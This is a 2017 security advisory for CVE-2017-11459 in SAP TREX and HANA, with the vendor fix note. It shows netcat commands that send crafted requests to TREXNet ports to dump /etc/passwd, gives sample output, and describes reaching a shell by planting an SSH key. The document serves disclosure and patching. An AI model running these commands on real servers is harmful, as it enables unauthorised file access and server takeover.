Application: SAP TREX **Versions Affected:**SAP TREX 7.10 Vendor URL: SAP **Bugs:**RCE **Reported:**23.01.2017 **Vendor response:**24.01.2017 **Date of Public Advisory:**11.04.2017 **Reference: **SAP Security Note 2419592 Author: Mathieu Geli (ERPScan)
Class: Missing Authentication for Critical Function
Impact: disclose OS files and potentially get RCE on the server (example for Linux)
Remotely Exploitable: yes
Locally Exploitable: no
CVE Name: CVE-2017-11459
CVSS v3 Base Score: 9.4 / 10
CVSS v3 Base Vector:
AV: Attack Vector (Related exploit range) | Network (N) |
---|---|
AC: Attack Complexity (Required attack complexity) | Low (L) |
PR: Privileges Required (Level of privileges needed to exploit) | None (N) |
UI: User Interaction (Required user participation) | None (N) |
S: Scope (Change in scope due to impact caused to components beyond the vulnerable component) | Unchanged (U) |
C: Impact to Confidentiality | High (H) |
I: Impact to Integrity | High (H) |
A: Impact to Availability | Low (L) |
Some sensitive operations are available anonymously that can be combined to potentially get remote command execution on the server.
A Remote Command Execution vulnerability allows an attacker to inject the code that can be executed by the application. The executed commands will run with the same privileges as the service that executed the command.
SAP TREX 7.10.72 (other versions not tested)
SAP HANA SPS12 (1.00.122.01.1470046197I)
SAP HANA 2.0 express edition (2.00.000.00.1479874437I)
To correct this vulnerability, install SAP Security Note 2419592
An attacker can forge special request to the TREXNet ports 3NN01, 3NN02, 3NN03, 3NN04, 3NN06, 3NN07, 3NN08 to read OS files (command 'fget'
) or create files (command 'fdir'
).
If the system is Linux (by default SSH is activated), we can showcase how to get a shell on the server with those two operations by uploading a public key in the serviceβs file ~/.ssh/authorized_keys
and then connect via SSH to the server, taking full control of the TREX daemon.
The first attached file "trex_fget_passwd.bin"
is a request to dump OS file /etc/passwd
on a Unix TREX 7.10 patched server.
You can run the exploit like this:
$ cat trex_fget_passwd.bin | nc <TREXSERVER> 30001
1
|
$ cat trex_fget_passwd.bin | nc <TREXSERVER> 30001
β|β
NB: The port can be any of the TREX ports (from 30001 to 30009).
The response should be the content of the @/etc/passwd@
file like:
at:x:25:25:Batch jobs daemon:/var/spool/atjobs:/bin/bash bin:x:1:1:bin:/bin:/bin/bash daemon:x:2:2:Daemon:/sbin:/bin/bash ftp:x:40:49:FTP account:/srv/ftp:/bin/bash games:x:12:100:Games account:/var/games:/bin/bash gdm:x:107:112:Gnome Display Manager daemon:/var/lib/gdm:/bin/false [β¦]
1
2
3
4
5
6
7
|
at:x:25:25:Batch jobs daemon:/var/spool/atjobs:/bin/bash
bin:x:1:1:bin:/bin:/bin/bash
daemon:x:2:2:Daemon:/sbin:/bin/bash
ftp:x:40:49:FTP account:/srv/ftp:/bin/bash
games:x:12:100:Games account:/var/games:/bin/bash
gdm:x:107:112:Gnome Display Manager daemon:/var/lib/gdm:/bin/false
[β¦]
β|β
The second file is for HANA SPS12, dumping @/etc/passwd@
$ cat hanaSPS12_fget_passwd.bin | nc <HANASERVER> 30001
1
|
$ cat hanaSPS12_fget_passwd.bin | nc <HANASERVER> 30001
β|β
NB: The port can be any of the TREX ports (from 30001 to 30009)
The response should be the content of the @/etc/passwd@
file looking like:
at:x:25:25:Batch jobs daemon:/var/spool/atjobs:/bin/bash bin:x:1:1:bin:/bin:/bin/bash daemon:x:2:2:Daemon:/sbin:/bin/bash ftp:x:40:49:FTP account:/srv/ftp:/bin/bash games:x:12:100:Games account:/var/games:/bin/bash gdm:x:107:112:Gnome Display Manager daemon:/var/lib/gdm:/bin/false [β¦]
1
2
3
4
5
6
7
|
at:x:25:25:Batch jobs daemon:/var/spool/atjobs:/bin/bash
bin:x:1:1:bin:/bin:/bin/bash
daemon:x:2:2:Daemon:/sbin:/bin/bash
ftp:x:40:49:FTP account:/srv/ftp:/bin/bash
games:x:12:100:Games account:/var/games:/bin/bash
gdm:x:107:112:Gnome Display Manager daemon:/var/lib/gdm:/bin/false
[β¦]
β|β